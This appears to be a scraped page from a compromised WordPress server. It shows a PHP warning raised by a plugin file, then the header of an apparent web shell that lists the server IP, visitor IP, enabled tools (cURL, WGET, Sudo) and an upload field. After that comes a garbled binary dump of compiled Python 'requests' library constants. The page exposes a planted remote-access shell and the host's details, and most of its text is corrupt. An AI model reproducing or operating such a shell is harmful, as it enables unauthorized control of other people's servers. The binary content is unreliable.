Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �split�.�� �.���.��
]��dev�a.��
�append�.�� �0���.��* �&too many values to unpack (expected 3)�.�K.�K.�K.�� �builtins��slice���NKN��R�.�K.�K.�� ]�(KKKe.��8 �4Old version of cryptography ({}) may cause slowdown.�.�� �warnings�.�� �warn�.�� �RequestsDependencyWarning�.��� X�
Requests HTTP Library
~~~~~~~~~~~~~~~~~~~~~
Requests is an HTTP library, written in Python, for human beings. Basic GET
usage:
>>> import requests
>>> r = requests.get('https://www.python.org')
>>> r.status_code
200
>>> 'Python is a programming language' in r.content
True
... or POST:
>>> payload = dict(key1='value1', key2='value2')
>>> r = requests.post('https://httpbin.org/post', data=payload)
>>> print(r.text)
{
...
"form": {
"key2": "value2",
"key1": "value1"
},
...
}
The other HTTP methods are supported - see `requests.api`. Full documentation
is at <http://python-requests.org>.
:copyright: (c) 2017 by Kenneth Reitz.
:license: Apache 2.0, see LICENSE for more details.
�.�� �__doc__�.��7 �3/usr/lib/python3/dist-packages/requests/__init__.py�.�� �__file__�.��. ]��'/usr/lib/python3/dist-packages/requests�a.�� �__path__�.�K .�� �__spec__�.��
�origin�.�� �has_location�.�� �submodule_search_locations�.�� �
__cached__�.�� �urllib3�.�� �chardet�.�� �
exceptions�.�� h��.�� �check_compatibility�.�� �_check_cryptography�.�� �__version__�.��) h �AssertionError���h �
ValueError�����.��C �?urllib3 ({}) or chardet ({}) doesn't match a supported version!�.�� �urllib3.contrib�.�� � pyopenssl���.�h-.�� �inject_into_urllib3�.�� �cryptography�.�� h%��.�� �cryptography_version�.�� �urllib3.exceptions�.�� �DependencyWarning���.�h4.�� �simplefilter�.��
�ignore�.��. (� __title__��__description__��__url__�h%t�.�h8.�h9.�h:.��>